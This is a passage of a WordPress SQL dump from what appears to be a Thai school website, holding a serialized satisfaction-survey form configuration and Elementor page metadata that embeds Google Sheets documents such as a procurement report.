13\";s:38:\"nowrong-result-description-font-weight\";s:3:\"400\";s:12:\"enable-share\";s:2:\"on\";s:7:\"form_id\";s:4:\"1528\";s:11:\"form_status\";s:7:\"publish\";s:10:\"quiz_title\";s:1:\"-\";s:8:\"wrappers\";a:0:{}s:13:\"lead_settings\";a:0:{}s:9:\"quiz_name\";s:125:\"แบบสอบถามความพึงพอใจ/ไม่พอใจ ในการรับบริการ\";s:22:\"nowrong-toggle-palette\";s:0:\"\";s:5:\"order\";a:3:{i:0;s:8:\"question\";i:1;s:11:\"description\";i:2;s:5:\"image\";}s:10:\"submitData\";a:1:{s:11:\"button-text\";s:72:\"ส่งแบบประเมินความพึงพอใจ\";}}s:9:\"client_id\";N;s:22:\"integration_conditions\";a:0:{}s:9:\"behaviors\";a:0:{}s:13:\"notifications\";a:1:{i:0;a:7:{s:4:\"slug\";s:22:\"notification-7939-5840\";s:5:\"label\";s:12:\"School Email\";s:13:\"email-subject\";s:47:\"New Form Entry #{submission_id} for {form_name}\";s:12:\"email-editor\";s:45:\"<p>{submission_id}{quiz_result}{date_mdy}</p>\";s:16:\"email-recipients\";s:7:\"default\";s:10:\"recipients\";s:26:\"33010169@sisaketedu1.go.th\";s:8:\"cc-email\";s:17:\"nutkubp@gmail.com\";}}s:9:\"questions\";a:7:{i:0;a:4:{s:4:\"slug\";s:18:\"question-1755-1553\";s:7:\"answers\";a:1:{i:0;a:4:{s:5:\"title\";s:30:\"..............................\";s:5:\"image\";s:0:\"\";s:7:\"default\";s:0:\"\";s:6:\"result\";s:16:\"result-5153-9909\";}}s:4:\"type\";s:7:\"nowrong\";s:5:\"title\";s:57:\"ตอนที่ 1 ข้อมูลทั่วไป\";}i:1;a:4:{s:4:\"slug\";s:18:\"question-3928-2820\";s:7:\"answers\";a:2:{i:0;a:4:{s:5:\"title\";s:9:\"ชาย\";s:5:\"image\";s:0:\"\";s:7:\"default\";s:0:\"\";s:6:\"result\";s:16:\"result-5153-9909\";}i:1;a:4:{s:5:\"title\";s:12:\"หญิง\";s:5:\"image\";s:0:\"\";s:7:\"default\";s:0:\"\";s:6:\"result\";s:16:\"result-5153-9909\";}}s:4:\"type\";s:7:\"nowrong\";s:5:\"title\";s:9:\"เพศ\";}i:2;a:4:{s:4:\"slug\";s:18:\"question-7348-7730\";s:7:\"answers\";a:4:{i:0;a:4:{s:5:\"title\";s:31:\"ต่ำกว่า 20 ปี\";s:5:\"image\";s:0:\"\";s:7:\"default\";s:0:\"\";s:6:\"result\";s:16:\"result-5153-9909\";}i:1;a:4:{s:5:\"title\";s:14:\"21 - 40 ปี\";s:5:\"image\";s:0:\"\";s:7:\"default\";s:0:\"\";s:6:\"result\";s:16:\"result-5153-9909\";}i:2;a:4:{s:5:\"title\";s:14:\"41 - 60 ปี\";s:5:\"image\";s:0:\"\";s:7:\"default\";s:0:\"\";s:6:\"result\";s:16:\"result-5153-9909\";}i:3;a:4:{s:5:\"title\";s:27:\"60 ปีขึ้นไป\";s:5:\"image\";s:0:\"\";s:7:\"default\";s:0:\"\";s:6:\"result\";s:16:\"result-5153-9909\";}}s:4:\"type\";s:7:\"nowrong\";s:5:\"title\";s:12:\"อายุ\";}i:3;a:4:{s:4:\"slug\";s:18:\"question-2636-5717\";s:7:\"answers\";a:4:{i:0;a:4:{s:5:\"title\";s:30:\"ประถมศึกษา\";s:5:\"image\";s:0:\"\";s:7:\"default\";s:0:\"\";s:6:\"result\";s:16:\"result-5153-9909\";}i:1;a:4:{s:5:\"title\";s:98:\"มัธยมศึกษาตอนต้น/ตอนปลาย/เทียบเท่า\";s:5:\"image\";s:0:\"\";s:7:\"default\";s:0:\"\";s:6:\"result\";s:16:\"result-5153-9909\";}i:2;a:4:{s:5:\"title\";s:27:\"ปริญญาตรี\";s:5:\"image\";s:0:\"\";s:7:\"default\";s:0:\"\";s:6:\"result\";s:16:\"result-5153-9909\";}i:3;a:4:{s:5:\"title\";s:48:\"สูงกว่าปริญญาตรี\";s:5:\"image\";s:0:\"\";s:7:\"default\";s:0:\"\";s:6:\"result\";s:16:\"result-5153-9909\";}}s:4:\"type\";s:7:\"nowrong\";s:5:\"title\";s:57:\"ระดับการศึกษาสูงสุด\";}i:4;a:4:{s:4:\"slug\";s:18:\"question-1875-8045\";s:7:\"answers\";a:1:{i:0;a:4:{s:5:\"title\";s:26:\"..........................\";s:5:\"image\";s:0:\"\";s:7:\"default\";s:0:\"\";s:6:\"result\";s:16:\"result-5153-9909\";}}s:4:\"type\";s:7:\"nowrong\";s:5:\"title\";s:123:\"ตอนที่ 2 ความพึงพอใจ / ไม่พอใจต่อการรับบริการ\";}i:5;a:4:{s:4:\"slug\";s:18:\"question-7652-8151\";s:7:\"answers\";a:5:{i:0;a:4:{s:5:\"title\";s:1:\"5\";s:5:\"image\";s:0:\"\";s:7:\"default\";s:0:\"\";s:6:\"result\";s:16:\"result-5153-9909\";}i:1;a:4:{s:5:\"title\";s:1:\"4\";s:5:\"image\";s:0:\"\";s:7:\"default\";s:0:\"\";s:6:\"result\";s:16:\"result-5153-9909\";}i:2;a:4:{s:5:\"title\";s:1:\"3\";s:5:\"image\";s:0:\"\";s:7:\"default\";s:0:\"\";s:6:\"result\";s:16:\"result-5153-9909\";}i:3;a:4:{s:5:\"title\";s:1:\"2\";s:5:\"image\";s:0:\"\";s:7:\"default\";s:0:\"\";s:6:\"result\";s:16:\"result-5153-9909\";}i:4;a:4:{s:5:\"title\";s:1:\"1\";s:5:\"image\";s:0:\"\";s:7:\"default\";s:0:\"\";s:6:\"result\";s:16:\"result-5153-9909\";}}s:4:\"type\";s:7:\"nowrong\";s:5:\"title\";s:164:\"1.1 ขั้นตอนการให้บริการไม่ยุ่งยากซับซ้อน และมีความคล่องตัว\";}i:6;a:4:{s:4:\"slug\";s:18:\"question-6119-3850\";s:7:\"answers\";a:5:{i:0;a:4:{s:5:\"title\";s:1:\"5\";s:5:\"image\";s:0:\"\";s:7:\"default\";s:0:\"\";s:6:\"result\";s:16:\"result-5153-9909\";}i:1;a:4:{s:5:\"title\";s:1:\"4\";s:5:\"image\";s:0:\"\";s:7:\"default\";s:0:\"\";s:6:\"result\";s:16:\"result-5153-9909\";}i:2;a:4:{s:5:\"title\";s:1:\"3\";s:5:\"image\";s:0:\"\";s:7:\"default\";s:0:\"\";s:6:\"result\";s:16:\"result-5153-9909\";}i:3;a:4:{s:5:\"title\";s:1:\"2\";s:5:\"image\";s:0:\"\";s:7:\"default\";s:0:\"\";s:6:\"result\";s:16:\"result-5153-9909\";}i:4;a:4:{s:5:\"title\";s:1:\"1\";s:5:\"image\";s:0:\"\";s:7:\"default\";s:0:\"\";s:6:\"result\";s:16:\"result-5153-9909\";}}s:4:\"type\";s:7:\"nowrong\";s:5:\"title\";s:75:\"ความรวดเร็วในการให้บริการ\";}}s:7:\"results\";a:1:{i:0;a:4:{s:4:\"slug\";s:16:\"result-5153-9909\";s:5:\"title\";s:125:\"แบบสอบถามความพึงพอใจ/ไม่พอใจ ในการรับบริการ\";s:11:\"description\";s:0:\"\";s:5:\"order\";i:0;}}s:9:\"quiz_type\";s:7:\"nowrong\";}'),
(4222,1527,'title_style','hidden'),
(4223,1527,'_title_style','field_5d1a0217cf408'),
(4225,476,'_generateblocks_dynamic_css_version','2.1.0'),
(4226,1531,'title_style','hidden'),
(4227,1531,'_title_style','field_5d1a0217cf408'),
(4229,1533,'title_style','hidden'),
(4230,1533,'_title_style','field_5d1a0217cf408'),
(4231,1534,'title_style','hidden'),
(4232,1534,'_title_style','field_5d1a0217cf408'),
(4234,1536,'title_style','hidden'),
(4235,1536,'_title_style','field_5d1a0217cf408'),
(4237,1538,'title_style','hidden'),
(4238,1538,'_title_style','field_5d1a0217cf408'),
(4239,1539,'title_style','hidden'),
(4240,1539,'_title_style','field_5d1a0217cf408'),
(4241,1540,'_edit_lock','1751874502:1'),
(4242,1540,'_oembed_bc39e2a5fd6bcd9680278b80bcf4b42a','{{unknown}}'),
(4243,1540,'_oembed_58987b5702bd44e267ac94089e6d9886','{{unknown}}'),
(4244,1540,'_edit_last','1'),
(4245,1540,'title_style','default'),
(4246,1540,'_title_style','field_5d1a0217cf408'),
(4247,1541,'title_style','default'),
(4248,1541,'_title_style','field_5d1a0217cf408'),
(4250,1540,'_oembed_f0fc05860c8fd1dd7848fae1db6f4f8f','{{unknown}}'),
(4251,1543,'title_style','default'),
(4252,1543,'_title_style','field_5d1a0217cf408'),
(4253,1544,'_wp_attached_file','2025/07/รายงานการจัดซื้อจัดจ้างหรือจัดหาพัสดุประจำปี-2568.xlsx'),
(4254,1544,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:58275;}'),
(4255,1545,'title_style','default'),
(4256,1545,'_title_style','field_5d1a0217cf408'),
(4257,1546,'title_style','default'),
(4258,1546,'_title_style','field_5d1a0217cf408'),
(4260,1548,'title_style','default'),
(4261,1548,'_title_style','field_5d1a0217cf408'),
(4263,1550,'title_style','default'),
(4264,1550,'_title_style','field_5d1a0217cf408'),
(4267,1552,'title_style','default'),
(4268,1552,'_title_style','field_5d1a0217cf408'),
(4270,1554,'title_style','default'),
(4271,1554,'_title_style','field_5d1a0217cf408'),
(4273,1556,'title_style','default'),
(4274,1556,'_title_style','field_5d1a0217cf408'),
(4275,1557,'_elementor_edit_mode','builder'),
(4276,1557,'_elementor_template_type','kit'),
(4277,1558,'_elementor_edit_mode','builder'),
(4278,1558,'_elementor_template_type','wp-post'),
(4279,1559,'_elementor_edit_mode','builder'),
(4280,1559,'_elementor_template_type','post'),
(4281,1558,'_elementor_version','3.29.2'),
(4282,1558,'_edit_lock','1751355088:1'),
(4284,1560,'_elementor_edit_mode','builder'),
(4285,1560,'_elementor_template_type','wp-post'),
(4286,1560,'_elementor_version','3.29.2'),
(4287,1561,'_elementor_edit_mode','builder'),
(4288,1561,'_elementor_template_type','wp-post'),
(4289,1561,'_elementor_version','3.29.2'),
(4290,1558,'_wp_page_template','default'),
(4291,1558,'_elementor_data','[{\"id\":\"ae393ac\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\"},\"elements\":[{\"id\":\"16f23c0\",\"elType\":\"widget\",\"settings\":{\"embedpress_embeded_link\":\"https:\\/\\/docs.google.com\\/spreadsheets\\/d\\/1Z4focaRNpQBLiyIorbOdzccfYfzwwXlp\\/edit?usp=sharing&ouid=116408890257525538205&rtpof=true&sd=true\",\"prefix_nftcreator\":\"Created By\",\"prefix_nftprice\":\"Current Price\",\"prefix_nftlastsale\":\"Last Sale\",\"label_nftbutton\":\"See Details\",\"loadmorelabel\":\"Load More\",\"label_nftrank\":\"Rank\",\"label_nftdetails\":\"Details\",\"instafeedFollowBtnLabel\":\"Follow\",\"instafeedPostsCountText\":\"[count] posts\",\"instafeedFollowersCountText\":\"[count] followers\",\"instafeedPopupFollowBtnLabel\":\"Follow\",\"instafeedLoadmoreLabel\":\"Load More\",\"cPopupButtonText\":\"Schedule time with me\",\"adWidth\":\"300\",\"adHeight\":\"200\",\"adStart\":\"5\",\"adSkipButtonAfter\":\"5\",\"embedpress_protection_message\":\"You do not have access to this content. Only users with the following roles can view it: [user_roles].\",\"embedpress_lock_content_error_message\":\"Oops, that wasn\'t the right password. Try again.\",\"embedpress_password_placeholder\":\"Password\",\"embedpress_submit_button_text\":\"Unlock\",\"embedpress_submit_Unlocking_text\":\"Unlocking...\",\"embedpress_lock_content_heading\":\"Content Locked\",\"embedpress_lock_content_sub_heading\":\"Content is locked and requires password to access it.\",\"embedpress_lock_content_footer_message\":\"In case you don\'t have the password, kindly reach out to content owner or administrator to request access.\",\"width\":{\"unit\":\"px\",\"size\":1500,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"embedpres_elementor\"}],\"isInner\":false}]'),
(4292,1562,'_elementor_edit_mode','builder'),
(4293,1562,'_elementor_template_type','wp-post'),
(4294,1562,'_elementor_version','3.29.2'),
(4295,1562,'_wp_page_template','default'),
(4296,1562,'_elementor_data','[{\"id\":\"ae393ac\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\"},\"elements\":[{\"id\":\"16f23c0\",\"elType\":\"widget\",\"settings\":{\"embedpress_embeded_link\":\"https:\\/\\/docs.google.com\\/spreadsheets\\/d\\/1Z4focaRNpQBLiyIorbOdzccfYfzwwXlp\\/edit?gid=1698444854#gid=1698444854\",\"prefix_nftcreator\":\"Created By\",\"prefix_nftprice\":\"Current Price\",\"prefix_nftlastsale\":\"Last Sale\",\"label_nftbutton\":\"See Details\",\"loadmorelabel\":\"Load More\",\"label_nftrank\":\"Rank\",\"label_nftdetails\":\"Details\",\"instafeedFollowBtnLabel\":\"Follow\",\"instafeedPostsCountText\":\"[count] posts\",\"instafeedFollowersCountText\":\"[count] followers\",\"instafeedPopupFollowBtnLabel\":\"Follow\",\"instafeedLoadmoreLabel\":\"Load More\",\"cPopupButtonText\":\"Schedule time with me\",\"adWidth\":\"300\",\"adHeight\":\"200\",\"adStart\":\"5\",\"adSkipButtonAfter\":\"5\",\"embedpress_protection_message\":\"You do not have access to this content. Only users with the following roles can view it: [user_roles].\",\"embedpress_lock_content_error_message\":\"Oops, that wasn\'t the right password. Try again.\",\"embedpress_password_placeholder\":\"Password\",\"embedpress_submit_button_text\":\"Unlock\",\"embedpress_submit_Unlocking_text\":\"Unlocking...\",\"embedpress_lock_content_heading\":\"Content Locked\",\"embedpress_lock_content_sub_heading\":\"Content is locked and requires password to access it.\",\"embedpress_lock_content_footer_message\":\"In case you don\'t have the password, kindly reach out to content owner or administrator to request access.\",\"width\":{\"unit\":\"px\",\"size\":1500,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"embedpres_elementor\"}],\"isInner\":false}]'),
(4306,1564,'_elementor_edit_mode','builder'),
(4307,1564,'_elementor_template_type','wp-post'),
(4308,1564,'_elementor_version','3.29.2'),
(4309,1564,'_wp_page_template','default'),
(4310,1564,'_elementor_data','[{\"id\":\"ae393ac\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\"},\"elements\":[{\"id\":\"16f23c0\",\"elType\":\"widget\",\"settings\":{\"embedpress_embeded_link\":\"https:\\/\\/docs.google.com\\/spreadsheets\\/d\\/1Z4focaRNpQBLiyIorbOdzccfYfzwwXlp\\/edit?gid=1698444854#gid=1698444854\",\"prefix_nftcreator\":\"Created By\",\"prefix_nftprice\":\"Current Price\",\"prefix_nftlastsale\":\"Last Sale\",\"label_nftbutton\":\"See Details\",\"loadmorelabel\":\"Load More\",\"label_nftrank\":\"Rank\",\"label_nftdetails\":\"Details\",\"instafeedFollowBtnLabel\":\"Follow\",\"instafeedPostsCountText\":\"[count] posts\",\"instafeedFollowersCountText\":\"[count] followers\",\"instafeedPopupFollowBtnLabel\":\"Follow\",\"instafeedLoadmoreLabel\":\"Load More\",\"cPopupButtonText\":\"Schedule time with me\",\"adWidth\":\"300\",\"adHeight\":\"200\",\"adStart\":\"5\",\"adSkipButtonAfter\":\"5\",\"embedpress_protection_message\":\"You do not have access to this content. Only users with the following roles can view it: [user_roles].\",\"embedpress_lock_content_error_message\":\"Oops, that wasn\'t the right password. Try again.\",\"embedpress_password_placeholder\":\"Password\",\"embedpress_submit_button_text\":\"Unlock\",\"embedpress_submit_Unlocking_text\":\"Unlocking...\",\"embedpress_lock_content_heading\":\"Content Locked\",\"embedpress_lock_content_sub_heading\":\"Content is locked and requires password to access it.\",\"embedpress_lock_content_footer_message\":\"In case you don\'t have the password, kindly reach out to content owner or administrator to request access.\",\"width\":{\"unit\":\"px\",\"size\":1500,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"embedpres_elementor\"}],\"isInner\":false}]'),
(4314,1558,'_edit_last','1'),
(4315,1558,'title_style','default'),
(4316,1558,'_title_style','field_5d1a0217cf408'),
(4317,1564,'title_style','default'),
(4318,1564,'_title_style','field_5d1a0217cf408'),
(4319,1557,'_edit_lock','1751354804:1'),
(4320,1565,'_elementor_edit_mode','builder'),
(4321,1565,'_elementor_template_type','wp-post'),
(4322,1565,'_elementor_version','3.29.2'),
(4323,1565,'_wp_page_template','default'),
(4324,1565,'_elementor_data','[{\"id\":\"ae393ac\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\"},\"elements\":[{\"id\":\"16f23c0\",\"elType\":\"widget\",\"settings\":{\"embedpress_embeded_link\":\"https:\\/\\/docs.google.com\\/spreadsheets\\/d\\/1Z4focaRNpQBLiyIorbOdzccfYfzwwXlp\\/edit?gid=1698444854#gid=1698444854\",\"prefix_nftcreator\":\"Created By\",\"prefix_nftprice\":\"Current Price\",\"prefix_nftlastsale\":\"Last Sale\",\"label_nftbutton\":\"See Details\",\"loadmorelabel\":\"Load More\",\"label_nftrank\":\"Rank\",\"label_nftdetails\":\"Details\",\"instafeedFollowBtnLabel\":\"Follow\",\"instafeedPostsCountText\":\"[count] posts\",\"instafeedFollowersCountText\":\"[count] followers\",\"instafeedPopupFollowBtnLabel\":\"Follow\",\"instafeedLoadmoreLabel\":\"Load More\",\"cPopupButtonText\":\"Schedule time with me\",\"adWidth\":\"300\",\"adHeight\":\"200\",\"adStart\":\"5\",\"adSkipButtonAfter\":\"5\",\"embedpress_protection_message\":\"You do not have access to this content. Only users with the following roles can view it: [user_roles].\",\"embedpress_lock_content_error_message\":\"Oops, that wasn\'t the right password. Try again.\",\"embedpress_password_placeholder\":\"Password\",\"embedpress_submit_button_text\":\"Unlock\",\"embedpress_submit_Unlocking_text\":\"Unlocking...\",\"embedpress_lock_content_heading\":\"Content Locked\",\"embedpress_lock_content_sub_heading\":\"Content is locked and requires password to access it.\",\"embedpress_lock_content_footer_message\":\"In case you don\'t have the password, kindly reach out to content owner or administrator to request access.\",\"width\":{\"unit\":\"px\",\"size\":1500,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"embedpres_elementor\"}],\"isInner\":false}]'),
(4328,1566,'_elementor_edit_mode','builder'),
(4329,1566,'_elementor_template_type','wp-post'),
(4330,1566,'_elementor_version','3.29.2'),
(4331,1566,'_wp_page_template','default'),
(4332,1566,'_elementor_data','[{\"id\":\"ae393ac\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\"},\"elements\":[{\"id\":\"16f23c0\",\"elType\":\"widget\",\"settings\":{\"embedpress_embeded_link\":\"https:\\/\\/docs.google.com\\/spreadsheets\\/d\\/1Z4focaRNpQBLiyIorbOdzccfYfzwwXlp\\/edit?gid=1698444854#gid=1698444854\",\"prefix_nftcreator\":\"Created By\",\"prefix_nftprice\":\"Current Price\",\"prefix_nftlastsale\":\"Last Sale\",\"label_nftbutton\":\"See Details\",\"loadmorelabel\":\"Load More\",\"label_nftrank\":\"Rank\",\"label_nftdetails\":\"Details\",\"instafeedFollowBtnLabel\":\"Follow\",\"instafeedPostsCountText\":\"[count] posts\",\"instafeedFollowersCountText\":\"[count] followers\",\"instafeedPopupFollowBtnLabel\":\"Follow\",\"instafeedLoadmoreLabel\":\"Load More\",\"cPopupButtonText\":\"Schedule time with me\",\"adWidth\":\"300\",\"adHeight\":\"200\",\"adStart\":\"5\",\"adSkipButtonAfter\":\"5\",\"embedpress_protection_message\":\"You do not have access to this content. Only users with the following roles can view it: [user_roles].\",\"embedpress_lock_content_error_message\":\"Oops, that wasn\'t the right password. Try again.\",\"embedpress_password_placeholder\":\"Password\",\"embedpress_submit_button_text\":\"Unlock\",\"embedpress_submit_Unlocking_text\":\"Unlocking...\",\"embedpress_lock_content_heading\":\"Content Locked\",\"embedpress_lock_content_sub_heading\":\"Content is locked and requires password to access it.\",\"embedpress_lock_content_footer_message\":\"In case you don\'t have the password, kindly reach out to content owner or administrator to request access.\",\"width\":{\"unit\":\"px\",\"size\":1500,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"embedpres_elementor\"}],\"isInner\":false}]'),
(4336,1567,'_elementor_edit_mode','builder'),
(4337,1567,'_elementor_template_type','wp-post'),
(4338,1567,'_elementor_version','3.29.2'),
(4339,1567,'_wp_page_template','default'),
(4340,1567,'_elementor_data','[{\"id\":\"ae393ac\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\"},\"elements\":[{\"id\":\"16f23c0\",\"elType\":\"widget\",\"settings\":{\"embedpress_embeded_link\":\"https:\\/\\/docs.google.com\\/spreadsheets\\/d\\/1Z4focaRNpQBLiyIorbOdzccfYfzwwXlp\\/edit?gid=1698444854#gid=1698444854\",\"prefix_nftcreator\":\"Created By\",\"prefix_nftprice\":\"Current Price\",\"prefix_nftlastsale\":\"Last Sale\",\"label_nftbutton\":\"See Details\",\"loadmorelabel\":\"Load More\",\"label_nftrank\":\"Rank\",\"label_nftdetails\":\"Details\",\"instafeedFollowBtnLabel\":\"Follow\",\"instafeedPostsCountText\":\"[count] posts\",\"instafeedFollowersCountText\":\"[count] followers\",\"instafeedPopupFollowBtnLabel\":\"Follow\",\"instafeedLoadmoreLabel\":\"Load More\",\"cPopupButtonText\":\"Schedule time with me\",\"adWidth\":\"300\",\"adHeight\":\"200\",\"adStart\":\"5\",\"adSkipButtonAfter\":\"5\",\"embedpress_protection_message\":\"You do not have access to this content. Only users with the following roles can view it: [user_roles].\",\"embedpress_lock_content_error_message\":\"Oops, that wasn\'t the right password. Try again.\",\"embedpress_password_placeholder\":\"Password\",\"embedpress_submit_button_text\":\"Unlock\",\"embedpress_submit_Unlocking_text\":\"Unlocking...\",\"embedpress_lock_content_heading\":\"Content Locked\",\"embedpress_lock_content_sub_heading\":\"Content is locked and requires password to access it.\",\"embedpress_lock_content_footer_message\":\"In case you don\'t have the password, kindly reach out to content owner or administrator to request access.\",\"width\":{\"unit\":\"px\",\"size\":1500,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"embedpres_elementor\"}],\"isInner\":false}]'),
(4344,1568,'_elementor_edit_mode','builder'),
(4345,1568,'_elementor_template_type','wp-post'),
(4346,1568,'_elementor_version','3.29.2'),
(4347,1568,'_wp_page_template','default'),
(4348,1568,'_elementor_data','[{\"id\":\"ae393ac\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\"},\"elements\":[{\"id\":\"16f23c0\",\"elType\":\"widget\",\"settings\":{\"embedpress_embeded_link\":\"https:\\/\\/docs.google.com\\/spreadsheets\\/d\\/1Z4focaRNpQBLiyIorbOdzccfYfzwwXlp\\/edit?gid=1698444854#gid=1698444854\",\"prefix_nftcreator\":\"Created By\",\"prefix_nftprice\":\"Current Price\",\"prefix_nftlastsale\":\"Last Sale\",\"label_nftbutton\":\"See Details\",\"loadmorelabel\":\"Load More\",\"label_nftrank\":\"Rank\",\"label_nftdetails\":\"Details\",\"instafeedFollowBtnLabel\":\"Follow\",\"instafeedPostsCountText\":\"[count] posts\",\"instafeedFollowersCountText\":\"[count] followers\",\"instafeedPopupFollowBtnLabel\":\"Follow\",\"instafeedLoadmoreLabel\":\"Load More\",\"cPopupButtonText\":\"Schedule time with me\",\"adWidth\":\"300\",\"adHeight\":\"200\",\"adStart\":\"5\",\"adSkipButtonAfter\":\"5\",\"embedpress_protection_message\":\"You do not have access to this content. Only users with the following roles can view it: [user_roles].\",\"embedpress_lock_content_error_message\":\"Oops, that wasn\'t the right password. Try again.\",\"embedpress_password_placeholder\":\"Password\",\"embedpress_submit_button_text\":\"Unlock\",\"embedpress_submit_Unlocking_text\":\"Unlocking...\",\"embedpress_lock_content_heading\":\"Content Locked\",\"embedpress_lock_content_sub_heading\":\"Content is locked and requires password to access it.\",\"embedpress_lock_content_footer_message\":\"In case you don\'t have the password, kindly reach out to content owner or administrator to request access.\",\"width\":{\"unit\":\"px\",\"size\":1500,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"embedpres_elementor\"}],\"isInner\":false}]'),
(4350,1569,'_elementor_edit_mode','builder'),
(4351,1569,'_elementor_template_type','wp-post'),
(4352,1569,'_elementor_version','3.29.2'),
(4353,1569,'_wp_page_template','default'),
(4354,1569,'_elementor_data','[{\"id\":\"ae393ac\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\"},\"elements\":[{\"id\":\"16f23c0\",\"elType\":\"widget\",\"settings\":{\"embedpress_embeded_link\":\"https:\\/\\/docs.google.com\\/spreadsheets\\/d\\/1Z4focaRNpQBLiyIorbOdzccfYfzwwXlp\\/edit?gid=1698444854#gid=1698444854\",\"prefix_nftcreator\":\"Created By\",\"prefix_nftprice\":\"Current Price\",\"prefix_nftlastsale\":\"Last Sale\",\"label_nftbutton\":\"See Details\",\"loadmorelabel\":\"Load More\",\"label_nftrank\":\"Rank\",\"label_nftdetails\":\"Details\",\"instafeedFollowBtnLabel\":\"Follow\",\"instafeedPostsCountText\":\"[count] posts\",\"instafeedFollowersCountText\":\"[count] followers\",\"instafeedPopupFollowBtnLabel\":\"Follow\",\"instafeedLoadmoreLabel\":\"Load More\",\"cPopupButtonText\":\"Schedule time with me\",\"adWidth\":\"300\",\"adHeight\":\"200\",\"adStart\":\"5\",\"adSkipButtonAfter\":\"5\",\"embedpress_protection_message\":\"You do not have access to this content. Only users with the following roles can view it: [user_roles].\",\"embedpress_lock_content_error_message\":\"Oops, that wasn\'t the right password. Try again.\",\"embedpress_password_placeholder\":\"Password\",\"embedpress_submit_button_text\":\"Unlock\",\"embedpress_submit_Unlocking_text\":\"Unlocking...\",\"embedpress_lock_content_heading\":\"Content Locked\",\"embedpress_lock_content_sub_heading\":\"Content is locked and requires password to access it.\",\"embedpress_lock_content_footer_message\":\"In case you don\'t have the password, kindly reach out to content owner or administrator to request access.\",\"width\":{\"unit\":\"px\",\"size\":1500,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"embedpres_elementor\"}],\"isInner\":false}]'),
(4356,1570,'_elementor_edit_mode','builder'),
(4357,1570,'_elementor_template_type','wp-post'),
(4358,1570,'_elementor_version','3.29.2'),
(4359,1570,'_wp_page_template','default'),
(4360,1570,'_elementor_data','[{\"id\":\"ae393ac\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\"},\"elements\":[{\"id\":\"16f23c0\",\"elType\":\"widget\",\"settings\":{\"embedpress_embeded_link\":\"https:\\/\\/docs.google.com\\/spreadsheets\\/d\\/1Z4focaRNpQBLiyIorbOdzccfYfzwwXlp\\/edit?usp=sharing&ouid=116408890257525538205&rtpof=true&sd=true\",\"prefix_nftcreator\":\"Created By\",\"prefix_nftprice\":\"Current Price\",\"prefix_nftlastsale\":\"Last Sale\",\"label_nftbutton\":\"See Details\",\"loadmorelabel\":\"Load More\",\"label_nftrank\":\"Rank\",\"label_nftdetails\":\"Details\",\"instafeedFollowBtnLabel\":\"Follow\",\"instafeedPostsCountText\":\"[count] posts\",\"instafeedFollowersCountText\":\"[count] followers\",\"instafeedPopupFollowBtnLabel\":\"Follow\",\"instafeedLoadmoreLabel\":\"Load More\",\"cPopupButtonText\":\"Schedule time with me\",\"adWidth\":\"300\",\"adHeight\":\"200\",\"adStart\":\"5\",\"adSkipButtonAfter\":\"5\",\"embedpress_protection_message\":\"You do not have access to this content. Only users with the following roles can view it: [user_roles].\",\"embedpress_lock_content_error_message\":\"Oops, that wasn\'t the right password. Try again.\",\"embedpress_password_placeholder\":\"Password\",\"embedpress_submit_button_text\":\"Unlock\",\"embedpress_submit_Unlocking_text\":\"Unlocking...\",\"embedpress_lock_content_heading\":\"Content Locked\",\"embedpress_lock_content_sub_heading\":\"Content is locked and requires password to access it.\",\"embedpress_lock_content_footer_message\":\"In case you don\'t have the password, kindly reach out to content owner or administrator to request access.\",\"width\":{\"unit\":\"px\",\"size\":1500,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"embedpres_elementor\"}],\"isInner\":false}]'),
(4364,1571,'_elementor_edit_mode','builder'),
(4365,1571,'_elementor_template_type','wp-post'),
(4366,1572,'_elementor_edit_mode','builder'),
(4367,1572,'_elementor_template_type','post'),
(4368,1571,'_elementor_version','3.29.2'),
(4369,1573,'title_style','hidden'),
(4370,1573,'_title_style','field_5d1a0217cf408'),
(4371,1571,'_edit_lock','1752543270:1'),
(4372,1574,'title_style','hidden'),
(4373,1574,'_title_style','field_5d1a0217cf408'),
(4374,1575,'title_style','hidden'),
(4375,1575,'_title_style','field_5d1a0217cf408'),
(4377,1571,'_wp_page_template','default'),
(4378,1571,'_elementor_data','[{\"id\":\"8d18942\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\"},\"elements\":[{\"id\":\"d98e4f2\",\"elType\":\"widget\",\"settings\":{\"embedpress_embeded_link\":\"https:\\/\\/docs.google.com\\/spreadsheets\\/d\\/18Al9i8m54QFeeHUxK9Yr6AVWTM3sifGz\\/edit?usp=sharing&ouid=116408890257525538205&rtpof=true&sd=true\",\"prefix_nftcreator\":\"Created By\",\"prefix_nftprice\":\"Current Price\",\"prefix_nftlastsale\":\"Last Sale\",\"label_nftbutton\":\"See Details\",\"loadmorelabel\":\"Load More\",\"label_nftrank\":\"Rank\",\"label_nftdetails\":\"Details\",\"instafeedFollowBtnLabel\":\"Follow\",\"instafeedPostsCountText\":\"[count] posts\",\"instafeedFollowersCountText\":\"[count] followers\",\"instafeedPopupFollowBtnLabel\":\"Follow\",\"instafeedLoadmoreLabel\":\"Load More\",\"cPopupButtonText\":\"Schedule time with me\",\"adWidth\":\"300\",\"adHeight\":\"200\",\"adStart\":\"5\",\"adSkipButtonAfter\":\"5\",\"embedpress_protection_message\":\"You do not have access to this content. Only users with the following roles can view it: [user_roles].\",\"embedpress_lock_content_error_message\":\"Oops, that wasn\'t the right password. Try 